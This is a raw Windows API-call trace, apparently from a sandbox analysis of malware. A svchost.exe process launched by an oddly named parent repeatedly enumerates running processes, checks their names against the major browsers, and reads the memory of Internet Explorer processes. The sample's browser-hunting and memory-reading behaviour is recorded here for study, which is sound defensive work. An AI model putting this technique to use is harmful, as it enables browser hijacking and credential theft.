	[0241.995] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.995] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0241.995] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.995] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0241.995] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.995] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0241.996] NtQueryInformationProcess (in: ProcessHandle=0x87f4, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0241.996] ReadProcessMemory (in: hProcess=0x87f4, lpBaseAddress=0x7ffdb000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0241.996] ReadProcessMemory (in: hProcess=0x87f4, lpBaseAddress=0x2b11c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0241.996] ReadProcessMemory (in: hProcess=0x87f4, lpBaseAddress=0x2b1998, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0241.996] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0241.996] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0xc38, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0241.997] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc94) returned 0x87f8
	[0241.997] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.997] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0241.998] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.998] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0241.998] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.998] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0241.998] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.998] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0241.998] NtQueryInformationProcess (in: ProcessHandle=0x87f8, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0241.998] ReadProcessMemory (in: hProcess=0x87f8, lpBaseAddress=0x7ffde000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0241.999] ReadProcessMemory (in: hProcess=0x87f8, lpBaseAddress=0x911c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0241.999] ReadProcessMemory (in: hProcess=0x87f8, lpBaseAddress=0x919ba, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0241.999] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0241.999] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x914, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x34c, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0242.000] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x914) returned 0x87fc
	[0242.000] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.000] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0242.000] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.000] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0242.000] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.000] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0242.001] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.001] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0242.001] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x914, pcPriClassBase=6, dwFlags=0x0, szExeFile="tadiapce.exe")) returned 1
	[0242.002] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x214) returned 0x8804
	[0242.002] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.002] StrStrIA (lpFirst="tadiapce.exe", lpSrch="chrome.exe") returned 0x0
	[0242.002] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.002] StrStrIA (lpFirst="tadiapce.exe", lpSrch="iexplore.exe") returned 0x0
	[0242.003] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.003] StrStrIA (lpFirst="tadiapce.exe", lpSrch="firefox.exe") returned 0x0
	[0242.003] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.003] StrStrIA (lpFirst="tadiapce.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0242.003] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaa8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0242.006] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaa8) returned 0x8808
	[0242.006] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.006] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0242.006] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.006] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0242.006] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.006] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0242.007] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.007] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0242.007] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x110, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0242.008] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0242.008] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x6d8) returned 0x880c
	[0242.008] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.008] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0242.009] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.009] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0242.009] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.009] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0242.009] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.009] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0242.010] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0242.010] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa70) returned 0x8810
	[0242.010] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.011] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0242.011] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.011] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0242.011] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.011] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0242.011] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.012] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0242.012] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0242.012] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc20) returned 0x8814
	[0242.013] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.013] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0242.013] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.013] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0242.013] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.013] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0242.014] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.014] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0242.014] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0242.015] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb28) returned 0x8818
	[0242.015] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.015] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0242.015] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.015] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0242.015] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.015] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0242.016] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.016] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0242.016] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xda0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0242.017] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xda0) returned 0x881c
	[0242.017] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.017] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0242.017] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.017] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0242.017] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.017] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0242.018] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.018] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0242.018] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbb4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xa70, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1
	[0242.019] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xbb4) returned 0x8820
	[0242.019] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.019] StrStrIA (lpFirst="cmd.exe", lpSrch="chrome.exe") returned 0x0
	[0242.019] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.019] StrStrIA (lpFirst="cmd.exe", lpSrch="iexplore.exe") returned 0x0
	[0242.019] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.019] StrStrIA (lpFirst="cmd.exe", lpSrch="firefox.exe") returned 0x0
	[0242.020] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.020] StrStrIA (lpFirst="cmd.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0242.020] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1
	[0242.021] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xbc0) returned 0x8824
	[0242.021] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.021] StrStrIA (lpFirst="conhost.exe", lpSrch="chrome.exe") returned 0x0
	[0242.021] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.021] StrStrIA (lpFirst="conhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0242.021] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.021] StrStrIA (lpFirst="conhost.exe", lpSrch="firefox.exe") returned 0x0
	[0242.022] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.022] StrStrIA (lpFirst="conhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0242.022] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x950, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xbb4, pcPriClassBase=8, dwFlags=0x0, szExeFile="net.exe")) returned 1
	[0242.023] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x950) returned 0x8828
	[0242.023] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.023] StrStrIA (lpFirst="net.exe", lpSrch="chrome.exe") returned 0x0
	[0242.023] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.023] StrStrIA (lpFirst="net.exe", lpSrch="iexplore.exe") returned 0x0
	[0242.023] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.023] StrStrIA (lpFirst="net.exe", lpSrch="firefox.exe") returned 0x0
	[0242.023] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.024] StrStrIA (lpFirst="net.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0242.024] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x748, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0242.024] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x748) returned 0x882c
	[0242.024] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.025] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0242.025] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.025] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0242.025] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.025] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0242.025] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.025] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0242.026] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x748, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 0
	[0242.026] CloseHandle (hObject=0x4fd0) returned 1
	[0242.026] Sleep (dwMilliseconds=0x64) 
	[0242.128] GetCurrentProcessId () returned 0x110
	[0242.128] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x4fd0
	[0242.132] Process32First (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0242.133] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0242.134] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0242.135] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x104) returned 0x8830
	[0242.135] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.135] StrStrIA (lpFirst="smss.exe", lpSrch="chrome.exe") returned 0x0
	[0242.135] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.136] StrStrIA (lpFirst="smss.exe", lpSrch="iexplore.exe") returned 0x0
	[0242.136] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.136] StrStrIA (lpFirst="smss.exe", lpSrch="firefox.exe") returned 0x0
	[0242.136] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.136] StrStrIA (lpFirst="smss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0242.137] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0242.138] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x148) returned 0x8834
	[0242.138] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.138] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0242.138] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.138] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0242.139] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.139] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0242.139] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.139] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0242.140] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0242.141] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x178) returned 0x8838
	[0242.141] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.141] StrStrIA (lpFirst="wininit.exe", lpSrch="chrome.exe") returned 0x0
	[0242.141] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.141] StrStrIA (lpFirst="wininit.exe", lpSrch="iexplore.exe") returned 0x0
	[0242.142] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.142] StrStrIA (lpFirst="wininit.exe", lpSrch="firefox.exe") returned 0x0
	[0242.142] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.143] StrStrIA (lpFirst="wininit.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0242.143] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0242.144] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x184) returned 0x883c
	[0242.144] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.144] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0242.145] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.145] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0242.145] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.145] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0242.146] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.146] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0242.146] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0242.147] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1ac) returned 0x8840
	[0242.147] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.147] StrStrIA (lpFirst="winlogon.exe", lpSrch="chrome.exe") returned 0x0
	[0242.148] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.148] StrStrIA (lpFirst="winlogon.exe", lpSrch="iexplore.exe") returned 0x0
	[0242.148] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.148] StrStrIA (lpFirst="winlogon.exe", lpSrch="firefox.exe") returned 0x0
	[0242.149] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.149] StrStrIA (lpFirst="winlogon.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0242.149] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0242.150] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1d8) returned 0x8844
	[0242.150] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.150] StrStrIA (lpFirst="services.exe", lpSrch="chrome.exe") returned 0x0
	[0242.150] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.150] StrStrIA (lpFirst="services.exe", lpSrch="iexplore.exe") returned 0x0
	[0242.151] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.151] StrStrIA (lpFirst="services.exe", lpSrch="firefox.exe") returned 0x0
	[0242.151] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.151] StrStrIA (lpFirst="services.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0242.152] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0242.153] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e0) returned 0x8848
	[0242.153] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.153] StrStrIA (lpFirst="lsass.exe", lpSrch="chrome.exe") returned 0x0
	[0242.153] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.153] StrStrIA (lpFirst="lsass.exe", lpSrch="iexplore.exe") returned 0x0
	[0242.154] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.154] StrStrIA (lpFirst="lsass.exe", lpSrch="firefox.exe") returned 0x0
	[0242.154] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.154] StrStrIA (lpFirst="lsass.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0242.155] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0242.156] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e8) returned 0x884c
	[0242.156] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.156] StrStrIA (lpFirst="lsm.exe", lpSrch="chrome.exe") returned 0x0
	[0242.156] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.156] StrStrIA (lpFirst="lsm.exe", lpSrch="iexplore.exe") returned 0x0
	[0242.157] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.157] StrStrIA (lpFirst="lsm.exe", lpSrch="firefox.exe") returned 0x0
	[0242.157] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.157] StrStrIA (lpFirst="lsm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
